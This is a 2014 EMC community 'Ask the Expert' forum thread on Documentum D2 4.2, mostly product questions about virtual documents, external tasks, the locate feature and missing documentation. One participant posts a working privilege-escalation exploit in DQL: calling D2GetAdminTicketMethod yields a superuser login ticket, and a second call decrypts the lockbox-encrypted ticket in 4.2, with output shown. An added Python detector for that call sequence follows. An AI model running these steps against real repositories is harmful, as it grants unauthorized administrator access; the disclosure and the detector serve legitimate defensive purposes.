
March 14th, 2014 10:00

Ask the Expert: EMC Announced Documentum D2 4.2

YOU MAY ALSO BE INTERESTED IN THESE ATE EVENTS...

Ask the Expert: What's New in EMC Documentum 7.1?

Ask the Expert: Features + Benefits of EMC Documentum D7

https://community.emc.com/thread/192130

Welcome to this EMC Support Community Ask the Expert conversation. This session will cover the recently released Documentum D2 4.2. D2 offers a highly intuitive and personalizable user experience that can accommodate individual preferences and working styles of different users while assuring compliance with organizational policies and standards. Documentum D2 takes the complexity out of ECM with a powerful configuration framework for creating purpose-built content solutions without the need to develop time-consuming customizations.

 

Your Hosts:

 

Goran Stepic is an IIG Technical Product Manager at EMC working on Technical Field Enablement (Documentum D2). His background is in hotel management and the fast food industry. In the mid-1990s and early 2000s he was involved with various IT projects (Hotel and Fast Food Industry Front and Back Office Systems, eGovernment projects) and worked in various positions (Administrator, 3rd Level support, Software Tester, Implementation Specialist, Certified IT Project Manager). In 2007 he joined EMC as a System Engineer in PreSales covering the region of Austria and Eastern Europe.

Julien Fontaine has been working with EMC Documentum for more than 10 years. He is known as an expert on his main activity, which is LifeSciences and E&U. His main domains are Documentum Content Server and EMC Documentum D2. Julien has also been part of EMC Elect ever since the program was created.

 

This discussion begins on March 17 and concludes on March 24. Get ready by following this page to receive updates in your activity stream or through email.

 

Share this event on Twitter:

"Join the next Ask the Expert: EMC Announced Documentum D2 4.2 March 17-24 http://bit.ly/1cZfNZL #EMCATE"

March 19th, 2014 13:00

In my opinion you should send a virtual document as a work package. In this case you will be able to manage the lifecycle of each document of your Work Package.

D2 provides powerful options to manage VDs and the documents inside your VD.

449 Posts

March 19th, 2014 19:00


Goran Stepic wrote:

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository.....

And what about use cases?

No comments? It's sad, let's read mine

The main D2 problem is that it does not follow the main concepts implemented in other Documentum products. For example: D2 does not use BOFv2, which makes it incompatible with other products; it actively uses docbase methods to perform some actions in the web interface (the last time I coded a docbase method was about 6 years ago), etc., etc. The technology level of D2 is somewhere between D5.3 and D6.0. Another problem is that D2 is not properly documented; actually this is a common problem for all Documentum products: when you install some product/application into a repository you have no idea what artifacts (object types, users, groups, methods, etc.) that product/application creates, and moreover you have no idea how to troubleshoot that product/application. So, before putting any Documentum product into production we always try to discover its functionality, and sometimes it brings a lot of fun (see also DCS Security Question). In November 2013 I discovered a vulnerability in D2 that allows any user to gain superuser privileges using D2GetAdminTicketMethod. It works in the following way:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)

After that, the user can use the admin ticket to log in to the repository with superuser privileges.

And EMC, instead of raising the technology level of their product, invented a new square wheel - lockbox (note they didn't even consider using dynamic groups):

[Image: 20-03-2014 12-08-57 PM.png]

Actually, EMC always misses the fact that encryption does not replace security (see also Re: Certificate-based SSL configuration problem) - when D4.2 was released I checked whether the security vulnerability was fixed or not, and the answer was - not:

New D2 behavior with lockbox:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------

AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2

hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b

aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+

44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH

q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc

KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l

9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi

iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo

rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg

/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f

gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ

jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==

(1 row affected)

Here D2GetAdminTicketMethod returns an encrypted ticket, and the attacker needs to perform another execution of D2GetAdminTicketMethod to decrypt the ticket:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)
1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)
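
Added example, not part of the thread and not EMC code: detection logic for the call sequence in the post above (a `do_method` call to `D2GetAdminTicketMethod` followed by a read of the `c6_method_return` object named in `-method_return_id`). It assumes executed DQL is exported as `time|user|DQL` lines; that format, the `d2_service` allowlist entry, the user names and the object ids are constructed for illustration.

```python
import re

# Assumed allowlist of accounts expected to call the method (hypothetical name).
ALLOWED_CALLERS = {"d2_service"}
DO_METHOD = re.compile(r"execute\s+do_method\s+with\s+method\s*=\s*'([^']+)'", re.I)
RETURN_ID = re.compile(r"-method_return_id\s+([0-9a-f]{16})", re.I)
READ_BACK = re.compile(
    r"select\s+(?:message|error)\s+from\s+c6_method_return\s+where\s+"
    r"r_object_id\s*=\s*'([0-9a-f]{16})'", re.I)


def find_ticket_abuse(lines):
    """Alert on D2GetAdminTicketMethod calls by users outside the allowlist.

    read_back is set when the same user later selects message/error from the
    c6_method_return object that was passed as -method_return_id.
    """
    alerts, pending = [], {}  # pending: (user, return id) -> alert
    for line in lines:
        ts, user, dql = (part.strip() for part in line.split("|", 2))
        call = DO_METHOD.search(dql)
        if call and call.group(1) == "D2GetAdminTicketMethod":
            if user in ALLOWED_CALLERS:
                continue
            rid = RETURN_ID.search(dql)
            alert = {"time": ts, "user": user, "read_back": False,
                     "return_id": rid.group(1).lower() if rid else None}
            alerts.append(alert)
            pending[(user, alert["return_id"])] = alert
            continue
        read = READ_BACK.search(dql)
        if read and (user, read.group(1).lower()) in pending:
            pending[(user, read.group(1).lower())]["read_back"] = True
    return alerts


# Constructed sample lines (format: time|user|DQL); users and ids are made up.
SAMPLE = [
    "2014-03-19T10:00:01|jdoe|create c6_method_return object set message='test'",
    "2014-03-19T10:00:05|jdoe|execute do_method with method='D2GetAdminTicketMethod', "
    "arguments='-docbase_name d2 -password \"\" -method_return_id 0000000180000a01'",
    "2014-03-19T10:00:09|jdoe|select message from c6_method_return "
    "where r_object_id='0000000180000a01'",
    "2014-03-19T10:01:00|d2_service|execute do_method with method='D2GetAdminTicketMethod', "
    "arguments='-docbase_name d2 -password \"\" -method_return_id 0000000180000a02'",
    "2014-03-19T10:02:00|asmith|select r_object_id from dm_document",
]
```

An alert with `read_back` set means the caller also retrieved the method's output, which is the step that hands the ticket to the session user.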

March 20th, 2014 12:00

PanfilovAB  you mark a point ...

Just a question, but I'm sure you already did it, did you open a new SR ?? What's the EMC answer to this security failure...

 

plasher  What's your thought about VD for your need ?

449 Posts

March 20th, 2014 21:00

Julien,

I thought here we were discussing D4.2 features, but not EMC support. And I do think I gave a complete answer about lockbox functionality (i.e. why it was introduced, why it does not work)  rather than put some marketing stuff.

12 Posts

March 21st, 2014 05:00

Is there a plan to release an object reference for all the object types that D2 creates?

Thank You.

3 Posts

March 21st, 2014 10:00

We are currently deliberating the option of using Virtual Documents. Any thoughts about our other two question topics?

March 21st, 2014 14:00

We're working on a white paper that will document the runtime objects used by D2.  It should be available in the next couple of weeks.

March 22nd, 2014 01:00

@plasher : External tasks are used to send tasks to external users (i.e. : Users that haven't got access to D2). These users will be able to accept or reject this task by sending an email to a specific address.

To send an email with multiple attachments, you should consider developing a method server and triggering it on your specific lifecycle change. There is no automatic feature like this... Otherwise, maybe with the distribution process.

449 Posts

March 23rd, 2014 23:00

silverj wrote:

We're working on a white paper that will document the runtime objects used by D2.  It should be available in the next couple of weeks.

Brilliant! Who invented such a ridiculous way (white papers instead of official documentation, xCelerators instead of core functionality) to provide documentation and functionality for customers? Why not accept candy wrappers as payment in such a case?

March 24th, 2014 01:00

Just before closing this event : What's the EMC answer about the security failure that Panfilov exposed earlier ?

It seems a very important subject for customer and partner !

449 Posts

March 25th, 2014 02:00

It seems a very important subject for customer and partner !

Nobody cares

March 26th, 2014 14:00

This Ask the Expert event has now ended. Thanks to our experts and those who participated in the discussion!

Just so you know, we're NOW having the following ATE events:

Ask the Expert: EMC Announced xCP 2.1

Ask the Expert: All about VMAX performance best practices


Please, join us or let your peers know about it.

Cheers!

69 Posts

September 16th, 2014 00:00

Some examples from an end user point of view :

- The same version of a document can be located in various folders, so you may want to go to a specific folder link.

- Also, the locate feature is useful when you want to reach a document from the relationship widget ("where is this document that is linked to my document located?")

September 16th, 2014 00:00

What is the use of the locate feature in D2 4.2? When we are in the location of the document, we already know the location of the document in the widget. Then why use the locate feature?

September 18th, 2014 02:00

Hi,

May I know how to create a workspace for specific users or groups? Thanks in advance.
